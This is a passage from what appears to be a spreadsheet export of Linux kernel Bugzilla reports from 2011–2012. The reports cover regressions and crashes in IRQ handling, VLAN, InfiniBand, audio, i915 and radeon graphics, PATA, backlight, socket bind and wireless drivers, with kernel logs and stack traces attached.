values reported in mWh are correct and the ones in mAh (right after power up/reboot) are not. Common Thinkpad batteries are rated at 10.8V, so the error with them is just 8% and probably that's why it hasn't been reported so far. However, I got a smaller 4-cell battery rated at 14.8V, and with this battery there is a huge discrepancy in powertop between immediate vs long-term power estimates.</t>
  </si>
  <si>
    <t>[BISECTED][REGRESSION] Regression with the IRQ subsystem introduced in 2.6.39 (and present in the 3.x version)</t>
  </si>
  <si>
    <t>2011-08-14 10:58 UTC</t>
  </si>
  <si>
    <t>2012-02-14 04:10 UTC</t>
  </si>
  <si>
    <t>Edward Donovan</t>
  </si>
  <si>
    <t>Hi, first of all, the categorization here in Bugzilla is not fine-grained enough (or, at least, I could not find a category that dealt with the IRQ subsistem). Let me also say that I am a newbie, but that I am willing to provide copious amounts of debugging information about my system, if I am directed what to do. I may, depending on the circumstances, even provide remote/SSH to this system of mine to ease debugging this nasty issue. OK, now, to the description, which is mostly a copy-and-paste of things that I sent to Thomas Gleixner, Dave Arlier and the LKML: After experiencing problems with many post 2.6.38 kernels (including the 3.x kernels) with X when I used Firefox to see any webpage that used some of the new HTML5 features (Firefox freeze completely X and I could only log in remotely with SSH), I took some time to see where things went wrong and, to cut a long story short, I bisected the kernel and I found that a commit of yours was the first one that introduced a problem with my system: fa27271bc8d230355c1f24ddea103824fdc12de6: genirq: Fixup poll handling Originally, I thought that the only affected part of the system was the video, but it didn't take me long to test the system and discover that my USB printer was also foobar'ed. In particular, when I accidentally booted with kernel 3.0 (I have many kernels in GRUB2): I printed a LaTeX document with only 2 pages of pure text. My printer is an inkjet printer connected via USB to my computer and it took about 6 minutes to print those 2 pages. The printer head moved, printing something, then it paused a bit, then it printed some more, then it paused some more, and so on. After just rebooting with 2.6.38, the very same document (with same userland etc.) was printed in 15 at most. My question now: is there anything that I could do to rectify this situation? I can give you loads of dumps from here, as long as you tell me what would be useful. Thanks, Rogério Brito.</t>
  </si>
  <si>
    <t>kernel 3.0 and above fails to handle vlan id 0 (802.1p) packets properly without hardware acceleration</t>
  </si>
  <si>
    <t>2011-08-14 12:48 UTC</t>
  </si>
  <si>
    <t>Mike Auty</t>
  </si>
  <si>
    <t>2011-08-28 19:22 UTC</t>
  </si>
  <si>
    <t>Hi there, I recently found that packets tagged with a vlan id of 0 are no longer received on the main interface. There were no dmesg entries on the dropped packets. I attempted to setup a vlan 0 interface and configure it, but couldn't successfully route traffic to the device. I can recreate this on two of the three networking devices I have, my guess is that the third does successfully handle hardware acceleration of vlan tags. After a bisection this appears to be related to commit bcc6d47903612c3861201cc3a866fb604f26b8b2, which seems to try to merge the non-hardware accelerated and hardware accelerated code paths for handling vlans. In the process, it appears vlan id 0 (802.1p) packets are no longer handled correctly. Unfortunately I don't know the code paths well enough to figure out what's going wrong, but I'd be happy to provide more information, run tests or try out patches if it would help, just let me know. Thanks... 5:) Mike 5:)</t>
  </si>
  <si>
    <t>[regression] [3.1-git] ipoib causes kernel panic (NULL pointer dereference)</t>
  </si>
  <si>
    <t>3.1-git</t>
  </si>
  <si>
    <t>2011-08-15 15:40 UTC</t>
  </si>
  <si>
    <t>Bernd Schubert</t>
  </si>
  <si>
    <t>2011-08-19 16:40 UTC</t>
  </si>
  <si>
    <t>Each time when I start IPoIB with any 3.1-rcX git version I tested so far I get a kernel panic. This didn't happen in 3.0 yet. fslab2 login: [ 114.392408] EXT4-fs (sdc): barriers disabled [ 114.449737] EXT4-fs (sdc): mounted filesystem with writeback data mode. Opts: journal_async_commit,barrier=0,data=writeback [ 240.944030] BUG: unable to handle kernel NULL pointer dereference at 0000000000000040 [ 240.948007] IP: [&lt;ffffffffa0366ce9&gt;] ipoib_start_xmit+0x39/0x280 [ib_ipoib] [ 240.948007] PGD 1f964f067 PUD 1f9bf2067 PMD 0 [ 240.948007] Oops: 0000 [#1] SMP [ 240.948007] CPU 1 [ 240.948007] Modules linked in: ext4 mbcache jbd2 crc16 nfsd ib_umad rdma_ucm rdma_cm iw_cm ib_addr ib_uverbs ib_ipoib sg ib_cm ib_sa ipv6 sd_mod crc_t10dif loop arcmsr md_mod pcspkr ib_mthca ib_mad ib_core 8250_pnp fuse af_packet nfs lockd fscache auth_rpcgss nfs_acl sunrpc btrfs lzo_decompress lzo_compress zlib_deflate crc32c libcrc32c crypto_hash crypto_algapi ata_generic pata_acpi e1000 pata_amd sata_nv libata scsi_mod unix [last unloaded: scsi_wait_scan] [ 240.948007] [ 240.948007] Pid: 0, comm: kworker/0:0 Not tainted 3.1.0-rc2+ #29 Supermicro H8DCE/H8DCE [ 240.948007] RIP: 0010:[&lt;ffffffffa0366ce9&gt;] [&lt;ffffffffa0366ce9&gt;] ipoib_start_xmit+0x39/0x280 [ib_ipoib] [ 240.948007] RSP: 0018:ffff8801ffc03c10 EFLAGS: 00010246 [ 240.948007] RAX: 0000000000000000 RBX: ffff8801f99ea000 RCX: 0000000000004420 [ 240.948007] RDX: 0000000000000000 RSI: ffff8801f99ea000 RDI: ffff8801f9afd500 [ 240.948007] RBP: ffff8801ffc03c40 R08: ffff8801f940d49c R09: ffff8801f9852240 [ 240.948007] R10: 0000000000000000 R11: 0000000000000020 R12: ffff8801f9afd500 [ 240.948007] R13: 0000000000000050 R14: ffff8801f99ea600 R15: ffff8801f9852280 [ 240.948007] FS: 00007f0b66016700(0000) GS:ffff8801ffc00000(0000) knlGS:0000000000000000 [ 240.948007] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b [ 240.948007] CR2: 0000000000000040 CR3: 00000001f9a65000 CR4: 00000000000006e0 [ 240.948007] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 240.948007] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 240.948007] Process kworker/0:0 (pid: 0, threadinfo ffff8800bfe82000, task ffff8800bfe6f1a0) [ 240.948007] Stack: [ 240.948007] 0000000000000010 ffff8801f9afd500 0000000000004420 0000000000000050 [ 240.948007] ffff8801f99ea000 ffff8801f9852280 ffff8801ffc03ca0 ffffffff812cd5e0 [ 240.948007] 0000000000000001 ffffffffa03721a0 ffffffff8131f680 ffff8801fa110540 [ 240.948007] Call Trace: [ 240.948007] &lt;IRQ&gt; [ 240.948007] [&lt;ffffffff812cd5e0&gt;] dev_hard_start_xmit+0x2a0/0x590 [ 240.948007] [&lt;ffffffff8131f680&gt;] ? arp_create+0x70/0x200 [ 240.948007] [&lt;ffffffff812e8e1f&gt;] sch_direct_xmit+0xef/0x1c0 [ 240.948007] [&lt;ffffffff812cd9f9&gt;] dev_queue_xmit+0x129/0x3b0 [ 240.948007] [&lt;ffffffff8131f853&gt;] arp_send+0x43/0x50 [ 240.948007] [&lt;ffffffff8131f96b&gt;] arp_solicit+0x10b/0x240</t>
  </si>
  <si>
    <t>Audio gain is massively higher in kernel 3.1</t>
  </si>
  <si>
    <t>2011-08-18 08:12 UTC</t>
  </si>
  <si>
    <t>2011-08-24 11:30 UTC</t>
  </si>
  <si>
    <t>The audio volume is much, much louder in 3.1-rc2 and -rc1 compared to kernel 3.0 and earlier for my card: 00:1b.0 Audio device: Intel Corporation 6 Series Chipset Family High Definition Audio Controller (rev 05) Subsystem: Dell Device 050e Flags: bus master, fast devsel, latency 0, IRQ 53 Memory at f1c00000 (64-bit, non-prefetchable) [size=16K] Capabilities: &lt;access denied&gt; Kernel driver in use: snd_hda_intel Kernel modules: snd-hda-intel Sound blasts out deafeningly unless I use alsamixer to adjust Master to zero (alsamixer says this is -64dB) and PCM to near to zero (eg a value like 27, ie -29dB). Note that with kernel 3.0, adjusting PCM in alsamixer does not affect the sound gain, but in 3.1 it (luckily!) does. It's quite difficult to adjust the sound to a non-painful level using gnome-volume control because the gain is biased so high.</t>
  </si>
  <si>
    <t>GPU hanging too fast, declaring wedged</t>
  </si>
  <si>
    <t>3.0.0-next-20110728+</t>
  </si>
  <si>
    <t>2011-08-21 14:22 UTC</t>
  </si>
  <si>
    <t>2012-04-19 06:27 UTC</t>
  </si>
  <si>
    <t>Mplayer sometimes hangs my graphics card. [208355.642949] [drm:i915_hangcheck_elapsed] *ERROR* Hangcheck timer elapsed... GPU hung [208355.642961] [drm] capturing error event; look for more information in /debug/dri/0/i915_error_state [208357.565873] [drm:i915_hangcheck_elapsed] *ERROR* Hangcheck timer elapsed... GPU hung [208357.565979] [drm:i915_wait_request] *ERROR* i915_wait_request returns -11 (awaiting 2541803 at 2541800, next 2541804) [208357.566080] [drm:i915_reset] *ERROR* GPU hanging too fast, declaring wedged! [208357.566089] [drm:i915_reset] *ERROR* Failed to reset chip. Sometimes when I start mplayer, or when I switch to the mplayer window then my graphics hang. The mouse still shows up but the windows are stuck. I can still switch to the non-graphical TTYs. I have to reboot to fix it. Next time when it happens I can mount debugfs. What information do you want from /debug/dri/0/i915_error_state? I can't reproduce this reliably. I've tried switching back and forth the mplayer like mad or starting it over and over but I couldn't find an easy way to trigger it. But it's not super rare either. Also looking at the version now, I see that that this kernel is not as recent as I had thought. I'll upgrade and see if the problem is still there.</t>
  </si>
  <si>
    <t>cfq-iosched: a regression</t>
  </si>
  <si>
    <t>2011-08-21 18:49 UTC</t>
  </si>
  <si>
    <t>2011-08-29 21:46 UTC</t>
  </si>
  <si>
    <t>Subject : cfq-iosched: a regression Submitter : Shaohua Li &lt;shaohua.li@intel.com&gt; Date : 2011-08-16 2:47 Message-ID : 1313462826.27321.22.camel@sli10-conroe References : http://marc.info/?l=linux-kernel&amp;m=131346279329911&amp;w=2 This entry is being used for tracking a regression from 3.0. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>IDE drivers work, PATA do not with SiS 5513 IDE/ATA Controller</t>
  </si>
  <si>
    <t>2011-08-23 05:35 UTC</t>
  </si>
  <si>
    <t>Dan McGee</t>
  </si>
  <si>
    <t>2012-05-12 13:47 UTC</t>
  </si>
  <si>
    <t>As summary states. Basically I can boot with an initrd containing sis5513/ide_core, but one containing pata_sis/libata does not work. It makes it through the initial boot, getting into the Arch Linux init scripts, and dying at the remount root step (`mount -n -o remount,rw /`). By dying, the initscripts proceed no further, the kernel has no more printk() output, and the HDD activity light on the machine stays on. I also have to hard reset at this point. Running Arch Linux, 3.0-ARCH #1 SMP PREEMPT Wed Aug 17 20:24:07 UTC 2011 i686 Intel(R) Pentium(R) 4 CPU 2.40GHz GenuineIntel GNU/Linux (really 3.0.3). I have bene experiencing this behavior ever since the pata stuff came into existence way back when, and have had to stick with the IDE drivers since, so this is not a new problem. I'm guessing some compatibility hack is missing? Relevant debug files that I can think of are attached. Please let me know what more you need. Obtaining anything from pata is a pain in the ass as I had to use netconsole to do that, so please let me know everything you may want or need upfront if I need to boot into that initrd.</t>
  </si>
  <si>
    <t>backlight control will not work on Lenovo V570</t>
  </si>
  <si>
    <t>3.1-rc3 and others</t>
  </si>
  <si>
    <t>2011-08-24 19:25 UTC</t>
  </si>
  <si>
    <t>Bill Pemberton</t>
  </si>
  <si>
    <t>2012-11-29 05:09 UTC</t>
  </si>
  <si>
    <t>No backlight options will be available on a Lenovo V570. I've tried it with several different kernel versions including 3.1-rc3. In all cases dmesg has the error ACPI Error: Current brightness invalid. It appears the kernel believes the machine is multi-headed. It does the right thing for the first head it sees and then gets the invalid brightness on the second head which causes it to assume acpi brightness won't work. The laptop has the standard external D-sub connector for an external monitor, but there is nothing connected to it. In fact, if I make the ugly hack of commenting out the multihead check in acpi_video_bus_check() then backlight control works fine. I'll attach the acpidump, dmesg, and ugly hack.</t>
  </si>
  <si>
    <t>duplicate filename  for intel_backlight with the i915 driver</t>
  </si>
  <si>
    <t>3.1-rc3</t>
  </si>
  <si>
    <t>2011-08-25 18:51 UTC</t>
  </si>
  <si>
    <t>2011-08-28 19:52 UTC</t>
  </si>
  <si>
    <t>I get this warning in dmesg with the i915 driver: 0.854960] ------------[ cut here ]------------ [ 0.855026] WARNING: at fs/sysfs/dir.c:455 sysfs_add_one+0xbd/0xf0() [ 0.855091] Hardware name: Satellite L670 [ 0.855148] sysfs: cannot create duplicate filename '/devices/pci0000:00/0000:00:02.0/drm/card0/card0-LVDS-1/intel_backlight' [ 0.855247] Modules linked in: [ 0.855327] Pid: 1, comm: swapper Not tainted 3.1.0-rc3 #1 [ 0.855390] Call Trace: [ 0.855448] [&lt;ffffffff81035dbb&gt;] ? warn_slowpath_common+0x7b/0xc0 [ 0.855510] [&lt;ffffffff81035eb5&gt;] ? warn_slowpath_fmt+0x45/0x50 [ 0.855573] [&lt;ffffffff8114229d&gt;] ? sysfs_add_one+0xbd/0xf0 [ 0.855639] [&lt;ffffffff81142d79&gt;] ? create_dir+0x79/0xe0 [ 0.855701] [&lt;ffffffff81142e52&gt;] ? sysfs_create_dir+0x72/0xc0 [ 0.855781] [&lt;ffffffff81177c15&gt;] ? kobject_add_internal+0xb5/0x200 [ 0.855843] [&lt;ffffffff81177f66&gt;] ? kobject_add+0x46/0x70 [ 0.855908] [&lt;ffffffff8126e649&gt;] ? device_add+0xa9/0x6a0 [ 0.855970] [&lt;ffffffff81028720&gt;] ? complete_all+0x40/0x60 [ 0.856034] [&lt;ffffffff811dea26&gt;] ? backlight_device_register+0xf6/0x1d0 [ 0.856102] [&lt;ffffffff8125e53f&gt;] ? intel_panel_setup_backlight+0x6f/0xe0 [ 0.856169] [&lt;ffffffff8124a629&gt;] ? intel_modeset_init+0x7c9/0x10f0 [ 0.856233] [&lt;ffffffff8122c861&gt;] ? i915_driver_load+0xcd1/0x11d0 [ 0.856298] [&lt;ffffffff811788e9&gt;] ? kobject_uevent_env+0x1d9/0x480 [ 0.856364] [&lt;ffffffff81219ada&gt;] ? drm_get_minor+0x1aa/0x2b0 [ 0.856427] [&lt;ffffffff8121bc58&gt;] ? drm_get_pci_dev+0x198/0x2c0 [ 0.856495] [&lt;ffffffff81278e6b&gt;] ? __pm_runtime_set_status+0x18b/0x230 [ 0.856561] [&lt;ffffffff81199625&gt;] ? local_pci_probe+0x55/0xd0 [ 0.857217] [&lt;ffffffff8119a52c&gt;] ? pci_device_probe+0x8c/0xc0 [ 0.857284] [&lt;ffffffff81270bb2&gt;] ? driver_sysfs_add+0x72/0xa0 [ 0.857347] [&lt;ffffffff81270cf6&gt;] ? driver_probe_device+0x96/0x1c0 [ 0.857412] [&lt;ffffffff81270eb3&gt;] ? __driver_attach+0x93/0xa0 [ 0.857474] [&lt;ffffffff81270e20&gt;] ? driver_probe_device+0x1c0/0x1c0 [ 0.857541] [&lt;ffffffff81270428&gt;] ? bus_for_each_dev+0x58/0x80 [ 0.857604] [&lt;ffffffff8126fce8&gt;] ? bus_add_driver+0x198/0x260 [ 0.857671] [&lt;ffffffff814f132a&gt;] ? drm_core_init+0x108/0x108 [ 0.857732] [&lt;ffffffff812714c0&gt;] ? driver_register+0x70/0x130 [ 0.857801] [&lt;ffffffff814f132a&gt;] ? drm_core_init+0x108/0x108 [ 0.857865] [&lt;ffffffff8119a7dc&gt;] ? __pci_register_driver+0x4c/0xc0 [ 0.857930] [&lt;ffffffff810001ca&gt;] ? do_one_initcall+0x3a/0x170 [ 0.857999] [&lt;ffffffff814d05b6&gt;] ? kernel_init+0x90/0x10e [ 0.858062] [&lt;ffffffff81350274&gt;] ? kernel_thread_helper+0x4/0x10 [ 0.858126] [&lt;ffffffff814d0526&gt;] ? parse_early_options+0x20/0x20 [ 0.858190] [&lt;ffffffff81350270&gt;] ? gs_change+0xb/0xb [ 0.858254] ---[ end trace b2296b39a6e7298d ]--- [ 0.858314] kobject_add_internal failed for intel_backlight with -EEXIST, don't try to register things with the same name in the same directory. [ 0.858418] Pid: 1, comm: swapper Tainted: G W 3.1.0-rc3 #1 [ 0.858484] Call Trace: [ 0.858536] [&lt;ffffffff81177cba&gt;] ? kobject_add_internal+0x15a/0x200 [ 0.858601] [&lt;ffffffff81177f66&gt;] ? kobject_add+0x46/0x70 [ 0.858666] [&lt;ffffffff8126e649&gt;] ? device_add+0xa9/0x6a0 [ 0.858727] [&lt;ffffffff81028720&gt;] ? complete_all+0x40/0x60 [ 0.858795] [&lt;ffffffff811dea26&gt;] ? backlight_device_register+0xf6/0x1d0 [ 0.858861] [&lt;ffffffff8125e53f&gt;] ? intel_panel_setup_backlight+0x6f/0xe0 [ 0.858927] [&lt;ffffffff8124a629&gt;] ? intel_modeset_init+0x7c9/0x10f0 [ 0.858991] [&lt;ffffffff8122c861&gt;] ? i915_driver_load+0xcd1/0x11d0 [ 0.859054] [&lt;ffffffff811788e9&gt;] ? kobject_uevent_env+0x1d9/0x480 [ 0.859119] [&lt;ffffffff81219ada&gt;] ? drm_get_minor+0x1aa/0x2b0 [ 0.859184] [&lt;ffffffff8121bc58&gt;] ? drm_get_pci_dev+0x198/0x2c0 [ 0.859246] [&lt;ffffffff81278e6b&gt;] ? __pm_runtime_set_status+0x18b/0x230 [ 0.859312] [&lt;ffffffff81199625&gt;] ? local_pci_probe+0x55/0xd0 [ 0.859377] [&lt;ffffffff8119a52c&gt;] ? pci_device_probe+0x8c/0xc0 [ 0.859442] [&lt;ffffffff81270bb2&gt;] ? driver_sysfs_add+0x72/0xa0 [ 0.859506] [&lt;ffffffff81270cf6&gt;] ? driver_probe_device+0x96/0x1c0 [ 0.859571] [&lt;ffffffff81270eb3&gt;] ? __driver_attach+0x93/0xa0 [ 0.859637] [&lt;ffffffff81270e20&gt;] ? driver_probe_device+0x1c0/0x1c0 [ 0.859702] [&lt;ffffffff81270428&gt;] ? bus_for_each_dev+0x58/0x80 [ 0.859774] [&lt;ffffffff8126fce8&gt;] ? bus_add_driver+0x198/0x260 [ 0.859838] [&lt;ffffffff814f132a&gt;] ? drm_core_init+0x108/0x108 [ 0.859902] [&lt;ffffffff812714c0&gt;] ? driver_register+0x70/0x130 [ 0.859966] [&lt;ffffffff814f132a&gt;] ? drm_core_init+0x108/0x108 [ 0.860028] [&lt;ffffffff8119a7dc&gt;] ? __pci_register_driver+0x4c/0xc0 [ 0.860092] [&lt;ffffffff810001ca&gt;] ? do_one_initcall+0x3a/0x170 [ 0.860154] [&lt;ffffffff814d05b6&gt;] ? kernel_init+0x90/0x10e [ 0.860215] [&lt;ffffffff81350274&gt;] ? kernel_thread_helper+0x4/0x10 [ 0.860279] [&lt;ffffffff814d0526&gt;] ? parse_early_options+0x20/0x20 [ 0.860342] [&lt;ffffffff81350270&gt;] ? gs_change+0xb/0xb [ 0.860402] [drm:intel_panel_setup_backlight] *ERROR* Failed to register backlight: -17 It doesn't seems to cause a real problem but can somebody explain what's happening ?</t>
  </si>
  <si>
    <t>[i915G] Yet Another Pin Leak</t>
  </si>
  <si>
    <t>2011-08-28 15:06 UTC</t>
  </si>
  <si>
    <t>I can crash the i915 driver on a gateway 550GR running fedora 15 kernel after a minute or so running the xscreensaver "fliptext".</t>
  </si>
  <si>
    <t>regression on 2.6.39.3 with socket/bind; still there in 3.0.4</t>
  </si>
  <si>
    <t>2.6.39.3 - 3.0.4</t>
  </si>
  <si>
    <t>2011-08-30 02:59 UTC</t>
  </si>
  <si>
    <t>Rene Meier</t>
  </si>
  <si>
    <t>2012-06-13 15:12 UTC</t>
  </si>
  <si>
    <t>Hi, the regression has been introduced in 2.6.39.3 with commit d0733d2e29b652b2e7b1438ececa732e4eed98eb. I experience this with a proprietary binary program. So I cant give you the source code which fails. This program used to work before but fails after applying this patch. As far as I understand the programm is using this code for ipc communication. I have recorded the strace output of the relevant part of the program. strace without d0733d2e29b652b2e7b1438ececa732e4eed98eb on kernel 2.6.39.2 --------------- 2056 socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 4 2056 bind(4, {sa_family=AF_UNSPEC, sa_data="\0\0\0\0\0\0\0\0\0\0\0\0\0\0"}, 16) = 0 2056 getsockname(4, {sa_family=AF_INET, sin_port=htons(33537), sin_addr=inet_addr("0.0.0.0")}, [16]) = 0 2056 listen(4, 5) = 0 2056 setsockopt(4, SOL_TCP, TCP_NODELAY, [1], 4) = 0 --------------- strace with d0733d2e29b652b2e7b1438ececa732e4eed98eb on kernel 2.6.39.2 --------------- 6190 socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 4 6190 bind(4, {sa_family=AF_UNSPEC, sa_data="\0\0\0\0\0\0\0\0\0\0\0\0\0\0"}, 16) = -1 EINVAL (Invalid argument) 6190 dup(2) = 11 6190 fcntl64(11, F_GETFL) = 0x8002 (flags O_RDWR|O_LARGEFILE) 6190 fstat64(11, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 3), ...}) = 0 6190 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x576ac000 6190 _llseek(11, 0, 0xffa03de4, SEEK_CUR) = -1 ESPIPE (Illegal seek) 6190 write(11, "ERROR: Failed to bind to interne"..., 66) = 66 6190 close(11) = 0 --------------- Btw, i have not enough knowledge on this topic to decide whether its the programs fault or the kernels fault. The binary program is sybyl8.1 from tripos. Best regards, Rene</t>
  </si>
  <si>
    <t>deadlock when using ipw2200</t>
  </si>
  <si>
    <t>3.1.0-rc4+</t>
  </si>
  <si>
    <t>2011-08-31 15:41 UTC</t>
  </si>
  <si>
    <t>2012-01-15 09:45 UTC</t>
  </si>
  <si>
    <t>After lots of hard work, i managed to intercept and write down kernel log messages. Somewhere after enabling my encrypted LVM, mounting root, something in initrd is loading ipw2200 early in boot process. (ipw200 looks to be initializing in parallel to the radeon drm - however disableing modeseting doesn't change anything). It looks like this libipw: 802.11 data/management/control stack, git-xxx libipw: Copyright (C) 2004-2005 Intel Corporation &lt;jketreno@linux.intel.com&gt; ipw2200: Intel(R) PRO/Wireless 2200/2915 Network Driver, xyxyx ipw2200: Copyright(c) 2003-2006 Intel Corporation ipw2200 0000:0b:02.0: PCI INT A -&gt; GSI 21 (level, low) -&gt; IRQ 21 ipw2200: Detected Intel PRO/Wireless 2915ABG Network Connection drm: something with radeon/drm/kms probably, irrelevant ================================================== INFO: possible recursive locking detected ================================================== modprobe/1095 is trying lock: (rtnl_mutex){+.+.+.}, at: [&lt;c146ba7f&gt;] rtnl_lock+0xf/0x20 but task is already holding lock: (rtnl_mutex){+.+.+.}, at: [&lt;c146ba7f&gt;] rtnl_lock+0xf/0x20 other info that might help us debug this: Possible unsafe locking scenario: CPU 0 ----- lock(rtnl_mutex); lock(rtnl_mutex); *** DEADLOCK *** May be due to missing lock nesting notation 4 locks held by modprobe/1095: #0: (&amp;__lockdep_no_validate__){......}, at: [&lt;c12fdfb8&gt;] __driver_attach+0x48/0xa0 #1: (&amp;__lockdep_no_validate__){......}, at: [&lt;c12fdfc4&gt;] __driver_attach+0x54/0xa0 #2: (rtnl_mutex){+.+.+.} at [&lt;c146ba7f&gt;] rtnl_lock+0xf/0x20 #2: (&amp;priv-&gt;mutex){+.+.+.} at [&lt;f8cc7bd1&gt;] ipw_net_init+0x41/0x2f0 Call trace ? printk+0x18 __lock_acquire+0x126c ? _raw_spin_unlock_irqrestore+0x31 ? trace_hardirq_on_caller+0xec lock_acquire+0x78 ? rtnl_lock+0xf mutex_lock_nested+0x44 ? rtnl_lock+0xf ? mutex_unlocked+0x8 ? rfkill_register+0x1ef rtnl_lock+0xf wiphy_register+0x469 ? __kmalloc+0x115 ? ipw_net_init+0xc0 ipw_net_init+0x1b9 register_netdevice+0xdd register_netdev+0x1b ipw_pci_probe+0xb4c pci_device_probe+0x8d ? sysfs_create_link+0x12 driver_probe_device+0x66 __driver_attach+0x91 ? driver_probe_device+0x180 bus_for_each_dev+0x41 ? pci_device_probe+0x120 driver_attach+0x1c ? driver_probe_device+0x180 bus_add_driver+0x1a7 ? pci_device_probe+0x180 driver_register+0x65 ? __raw_spin_lock_init+0x31 __pci_register_driver+0x52 ipw_init+0x31 do_one_initcall+0x2f ? 0xf8cdefff sys_init_module+0xb06 After this, system have some problems with multiple subsystems, including udev timeouts, read-only file systems, etc, etc. I belive that commit ecb443355 introduced this regression. commit ecb4433550f0620f3d1471ae7099037ede30a91e Author: Stanislaw Gruszka &lt;sgruszka@redhat.com&gt; Date: Fri Aug 12 14:00:59 2011 +0200 mac80211: fix suspend/resume races with unregister hw Thanks.</t>
  </si>
  <si>
    <t>mpt2sas: Number specified in wrong base.</t>
  </si>
  <si>
    <t>3.0.4</t>
  </si>
  <si>
    <t>2011-08-31 19:56 UTC</t>
  </si>
  <si>
    <t>Daniel Bradshaw</t>
  </si>
  <si>
    <t>I think this is the right product/component combination, sorry if it isn't. I was hunting through mpt2sas chasing unrelated hardware gremlins and noticed an odd bit of code, I've checked the latest version on lxr and it's still there. http://lxr.linux.no/linux+v3.0.4/drivers/scsi/mpt2sas/mpt2sas_base.c#L611 611 /* eat the loginfos associated with task aborts */ 612 if (ioc-&gt;ignore_loginfos &amp;&amp; (log_info == 30050000 || log_info == 613 0x31140000 || log_info == 0x31130000)) 614 return; 615 I'm assuming that the first of those log_info checks is meant to be 0x30050000, as specified it is rendered always false by the bus type check a few lines above. It's a minor detail, but I thought I'd report it anyway since it's so trivial to fix if you have the source to hand. Regards, Daniel</t>
  </si>
  <si>
    <t>[bisected] continuous gpu resets on radeon</t>
  </si>
  <si>
    <t>b03e7495a862b028294f59fc87286d6d78ee7fa1</t>
  </si>
  <si>
    <t>2011-09-01 15:05 UTC</t>
  </si>
  <si>
    <t>Niels Ole Salscheider</t>
  </si>
  <si>
    <t>Since commit b03e7495a862b028294f59fc87286d6d78ee7fa1 I experience continuous gpu resets on my Radeon HD6870 (see attached dmesg output). They happen during desktop usage but more often (nearly immediately) when playing a game. Booting with pci=pcie_bus_safe does not help.</t>
  </si>
  <si>
    <t>oops in wpa_supplicant (ieee80211_mgd_auth)</t>
  </si>
  <si>
    <t>3.0.3</t>
  </si>
  <si>
    <t>2011-09-02 07:22 UTC</t>
  </si>
  <si>
    <t>2012-01-16 15:25 UTC</t>
  </si>
  <si>
    <t>I get this every now and then, most recently on kernel 3.0.3. After that, the wireless doesn't work, I have to reboot, and the system hangs while it tries to shut down. The system is a Thinkpad T420 with iwlagn driver. Sep 1 21:53:25 better kernel: BUG: unable to handle kernel paging request at ffff8800b28a4ac0 Sep 1 21:53:25 better kernel: IP: [&lt;ffffffff811d7836&gt;] memcpy+0xc6/0x120 Sep 1 21:53:25 better kernel: PGD 1622063 PUD ba7c4067 PMD ba959067 PTE 80000000b28a4160 Sep 1 21:53:25 better kernel: Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC Sep 1 21:53:25 better kernel: CPU 1 Sep 1 21:53:25 better kernel: Modules linked in: nls_iso8859_1 nls_cp437 vfat fat mmc_block parport_pc ebtable_nat ebtables ppdev lp parport bnep rfcomm acpi_cpufreq mperf bluetooth cpufreq_ondemand cpufreq_powersave cpufreq_userspace cpufreq_conservative cpufreq_stats freq_table autofs4 binfmt_misc uinput microcode deflate ctr camellia cast5 rmd160 crypto_null ccm serpent blowfish twofish_x86_64 twofish_common ecb xcbc sha512_generic des_generic aesni_intel cryptd aes_x86_64 tunnel4 xfrm_ipcomp tunnel6 rng_core fuse nfsd exportfs nfs lockd auth_rpcgss nfs_acl sunrpc tun ip6table_filter ip6_tables iptable_nat nf_nat ipt_REJECT xt_NFLOG nfnetlink_log nfnetlink xt_limit xt_tcpudp nf_conntrack_ipv4 nf_defrag_ipv4 xt_state nf_conntrack xt_multiport iptable_filter ip_tables x_tables ipv6 hdaps tp_smapi thinkpad_ec coretemp loop firewire_sbp2 firewire_core crc_itu_t kvm_intel kvm joydev mousedev snd_hda_intel snd_hda_codec snd_hwdep thinkpad_acpi snd_pcm arc4 hwmon iwlagn snd_seq_midi mac80211 firmware_class snd_rawm Sep 1 21:53:25 better kernel: idi snd_seq_midi_event cfg80211 snd_seq uvcvideo cdc_ncm videodev usbnet mii cdc_wdm cdc_acm snd_timer pcspkr psmouse rfkill snd_seq_device v4l2_compat_ioctl32 serio_raw snd nvram i2c_i801 ac battery processor rtc_cmos mei(C) soundcore snd_page_alloc evdev ext4 mbcache jbd2 crc16 btrfs zlib_deflate crc32c libcrc32c hid_logitech usbhid hid usb_storage dm_crypt dm_mod sr_mod cdrom sd_mod sdhci_pci sdhci mmc_core ehci_hcd thermal i915 drm_kms_helper drm e1000e i2c_algo_bit cfbcopyarea usbcore button video backlight thermal_sys cfbimgblt cfbfillrect [last unloaded: parport_pc] Sep 1 21:53:25 better kernel: Sep 1 21:53:25 better kernel: Pid: 3405, comm: wpa_supplicant Tainted: G C 3.0.3-melech #1 LENOVO 4236NGG/4236NGG Sep 1 21:53:25 better kernel: RIP: 0010:[&lt;ffffffff811d7836&gt;] [&lt;ffffffff811d7836&gt;] memcpy+0xc6/0x120 Sep 1 21:53:25 better kernel: RSP: 0018:ffff88022c1e59b0 EFLAGS: 00010206 Sep 1 21:53:25 better kernel: RAX: ffff8801f6f2a501 RBX: ffff88022c1e5a38 RCX: 0000000000000000 Sep 1 21:53:25 better kernel: RDX: 000000000000000d RSI: ffff8800b28a4ac0 RDI: ffff8801f6f2a501 Sep 1 21:53:25 better kernel: RBP: ffff88022c1e59e8 R08: ffff8801f6f2a900 R09: 0000000000000000 Sep 1 21:53:25 better kernel: R10: ffff8801f6f2a480 R11: 00000000000000c0 R12: ffff8801f6f2a480 Sep 1 21:53:25 better kernel: R13: ffff880232f40400 R14: ffff880232948900 R15: 0000000000000000 Sep 1 21:53:25 better kernel: FS: 00007f3fc321f700(0000) GS:ffff88023e080000(0000) knlGS:0000000000000000 Sep 1 21:53:25 better kernel: CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 Sep 1 21:53:25 better kernel: CR2: ffff8800b28a4ac0 CR3: 000000022c049000 CR4: 00000000000406e0 Sep 1 21:53:25 better kernel: DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 Sep 1 21:53:25 better 